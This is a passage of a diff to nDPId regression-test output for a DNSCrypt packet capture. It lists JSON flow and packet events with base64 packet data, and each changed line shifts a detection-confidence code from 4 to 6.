AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":577,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vYAuX4RQfUKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":578,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vUAuX4RQfYKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vcgAH4RHSEKAAABF29KzerRAbsGBKkvS8QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739402188} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":580,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAABQ1vcAuX4RQfQKAAABF29KzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":946739402352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739402352,"pkt":"ZmZmZmZmRERERERECABFAADUpqhAADURe3gXb0rNCgAAAQG76MMAwNUkS8OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADFMi1FdTWI6xs9AIHJqo\/A+wDfjlj3WkVYnoIQAvOP3ISfoMelOBqvsYElaECIkBkM1KRmWo7IwtwzQE5GK6ICxIfEdneiwuXVbSuJIibtWiAHFQr52HeEOQNDYtX2pkLEh8R2d6LC5QAAAAFfU1VGX1Smxg=="} 
@@ -1178,292 +1178,292 @@ 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739611961,"flow_last_seen":946739611961,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":946739611961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739611961,"pkt":"REREREREZmZmZmZmCABFAAJcJkxAAKYRdegKAAABl1DeT7m5AbsCSDi2hxVktS2XlAXK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDO6Ugg3iONmSyzFBmv3WeUbwZp9IYiTM191d4EGpSNgn1Vnmhi0dnshrsldty0p0rog9vCUpw6jzc4+P9Puw1SQZaVq6AQHs9j8FHA6TV2fEODI+IleWgpNwN7RkTyReTtbcAyqcw4LZqRdzr4SFPlNOAV9QpavHsXRRYeP7A8ijLspxo8F1YH1toI16qO3Wyz3w2HsVy3nP0JwlulITaJBD9qG3whIbZyqhQYyJ2BvR67IS++x+jXq0MGJud5+s9l28XPdTs\/vK3y+tQd2+A5CezpWRNwOoTnzQrdnO5idkwCcFNbHZKDQFROmtVXAPisaIFuh2zDBTP9EootPFJMHtt5MCwQKxsqxAokmytyeHxjFqA8WwfVcAi5mF\/ZuGsfcjSKloXW082oaEMVSIkwJ74\/Jb+rJZiHxMq58YuihNtogJ1XyZ7N5w9vgrIru3Mf+Yb1s51E\/BAtAVet5JOSYKjHsRrwqjR5SM92Qhm81hCxh\/GAZd8BGwMYGW43YzzX7cWwZTJxpff01gK7OvmzthL7xQA0ARPjY6jfbbFZeg4DdbEVEZyuWoK3KXb6sDjKwxJLrncbQshDJtGHzwOzijM3V5WnhnWXGriaawdzvTvZzhIQ0srq9F4tmvJ8cwU537l2ggbdtCOlpHKYsSA7i9H4MB3lIBKJSrAhjGcr6R+mT\/OaHMOBRDayFlbn\/EG+N1\/YwEFto6"} 
00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":946739612032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":946739612032,"pkt":"ZmZmZmZmRERERERECABFAAGMXAxAADQRsviXUN5PCgAAAQG7ubkBeOzQcjZmbnZXajjulIIN4jjZkssxQZqSDAUmKpfd49BFPcXUJNsH1tfF8ILOrmEInURZhClsi8Vfa6egoR1ZaEP2TFIvnnwmg3DMIMPj1X93gFJnlICV6s1bYKcQ0IVszmSovV29MoXsJXRtqoBvjWoL6erf64n\/9lY7Pizn5GAIJ+ZpdKmiKxdjxBHa0Bf9zJfNMagz21JNImGKGgrF3C+muN5QaVzi53jM6qhgKER\/YzujMJfiHF\/aaLCV7ensBtZtMGPEX2NyQDksoYgHkNVty+uHcb5FWtodWfWQwK\/pSx8\/6EDGrCYsD3hCk628LO83kEMpLh3mWe\/DOYJ4VpTxZ8unmS83bK0xOwnj+LV6NHmYBoNZVrz1zkXkqx7GlUurn5Yj1XRRPDFjXpVJqBkZG7vuwQAAc0Zs2zwVPvHOdh3jfX9L6TmayQGceJ8L7zIXqi14xI3xt4P62MSxtYdyqx5X5yN0e0crNQn80yUKKZ8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739612032,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739614386,"flow_last_seen":946739614386,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739614386,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":946739614386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739614386,"pkt":"REREREREZmZmZmZmCABFAAJc989AAKYRHsYKAAABkFtq45cEAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCN0sI1afsDgB7g4z3waLSDC2o9apEHGrmX1\/\/XVDTnA82XGV5BkJ6hyx9SwD+WiC6uDTp6AbKbCDGnUn3j+tLJpn2hItHoTa\/xeDArjby7slJF40ySc4tPuE+UMiXypOsTanLuynVvS9n8gbILRPI43brHHY7HDFenFZDOtfB+JxdnOOFNDYhfJprBR2DTCXiO3N4Bex+NG0pKxAEiN254J3qeD3\/OAwnKA81+nREhgnE+6I0CyIA201vB4x+d\/+mhwpFUuUhbbD\/SfJPnQXjy3jOXtIJLaIFLNycvxG+PS5Ojxq9uCtE2XhA4tfk90STkQEJNACVZbLwRyAcYZfg9qxeV8twgsNlEDF5PIG3nzQvpvywuTYlFQryvjTvIH4VR9wK25AyfzR7C\/t+iRavrUqnzmU\/fAOG0CvTaSqHI+4MnbhUZVoxS2UyUFdELJqReTeLin8fcrvX1wJgCVSp8+cPs7vBKaV+JiLAgU+OxuxldboVrer9459FyQl4WFjHazGEL4xKqJvMIvrueodNiqXGE6cS6tIYUKgaQ4AFmKHlACJF\/olwP9NoAOKSUY3Y66DFQ4v+LM9mU+SWhao2muTb4Tju4w6ERuBOUyzP9LBhYeQUMfKmBYpIb+UNg41n6P7vyU8kDamY+f+xv4B8HSDYKX2DWu9KXaFSPBiu3SXVmscc3+ivcw18HJ9BS2CgGcv+eo7Dnd"} 
00780{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":946739614411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739614411,"pkt":"ZmZmZmZmRERERERECABFAAEMVHFAADcRMnWQW2rjCgAAAQG7lwQA+NqDcjZmbnZXajgjdLCNWn7A4Ae4OM+V95TEH+wEPWjCUqAPqLgKz03zsgxbeQD\/5ecQsA4RfRBRViLb9egczysjt1OolDW9kDXjXmmQiF571kS9rCn31TE60wfdQuvLsxXdWOqgaclRBMIB2+xIEcqZiOOnbAC3owgMpf07BM+8qosYU+1EzXz7EouWJa8VxL5FW0SNfmJsYYBjcSkC0myJwAMFESyFpxNCQtb+Z3Q2X9FOvOphUjS1Bh6POqoHGB4CgchAKjQ4X8fxQb5Wv65jhpmBRnmn5yUbcKZT8A2zfL7KGiy9Vrk+mU3WwB6UiVmU"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739614411,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739615603,"flow_last_seen":946739615603,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739615603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":946739615603,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739615603,"pkt":"REREREREZmZmZmZmCABFAAJc+DdAAKYRHl4KAAABkFtq4+vpAbsCSL5UGz3LRoQYGq7K1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDCAf8ZxPLtyAmkbotfhN9FBFDCeDP4ncrd\/TOhQoXS6aaK7Qk9xNjCJAE83nYrNPvD\/886RDhSKbcIu9OfJQKTcWCPazM2lBZj5zsNZveK3aqI2jCfxNNTpF+6txS57\/tj1ipnKY33r09Y4upstDW1n4WR1Nsfz7UrdB6\/6T5NqtK9QGMv\/EvcCVnsI4etNtWFQzRfRc7E0Skos7MBtpGgiC86vsChOu7VYwrpe6b0CyOg6OcUDxGDoVs5ICEPVHDsd2RqeGP3QVPcQgf4RCQy1ImYumox7n6l80U\/14hvlajMMIkDpEpiu4KAyZSDWRXbhAD60XmVYOZ0blLEelAzhupD39arDQughZsQic9xuigYdXIQBw\/Fbye0tmt8ihEnYnMhGIlRckiYzkA2ioG3ckpl1JlkazwpX87IXdgB1wqkVRuynhNnc1hxUbpiv0BrBR\/fV0UhwJN\/T1pdWRfFcsSRYMRLW\/ixpyROEV8e41kHMNotPvlHLtOyi\/2lXQAveUUQT3pByUNSr1McJDQGc7QNA5zFLNTZBJqb0kxE\/mLWe0EMXj7XbfUBu7q2gn8G7CETqFs71z\/s7TC\/nsaD\/ETkxWcTnA0aNzC2E\/O5fjyCETbuv3jbGkWzJPfOkBc4w2M9f3qNHjwEkn1LJYLOKWSLyq34DWAVom05p8N+1XzUjvKKpr2SZf2pwRkSXCrFPZsLRFNDkb"} 
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":946739615628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739615628,"pkt":"ZmZmZmZmRERERERECABFAAFMVRFAADcRMZWQW2rjCgAAAQG76+kBOCk6cjZmbnZXajggH\/GcTy7cgJpG6LWEOqYXy9eZW2i3Qbkc+\/ab87nm8hxILOmwmIagjS3082zNqzOBnUfDvXH1wdeKy55EXymmAOR3ISimesD3NSPRd1l+RxmfBHNn3a7Bw5aEHaIlwaCNLNQFqK+BhPyPkErS5VbNOhmY5xHp0Ui2kKe72GXKf4WLQR7zh9TTBssKJNiCiW7f2BiWF1TEyHipKDeny4ICpyTd3Wo2+B3IqtOVZ3rHmsTn5k+U7Dl0LO15r3tqh6n0WPCSwFlzqIYmOuOCTIqRIw6ZGfDu889dv4sOKdhqSdpo5gBsF5uRtahg1DOgrYIIV6k+VvSO\/ChUBVAry4GOrZXgTyxKsOYZ+21X5TNc3orLlCmaabkA\/armCA8Dr977H97D0+Y1rw=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739615628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 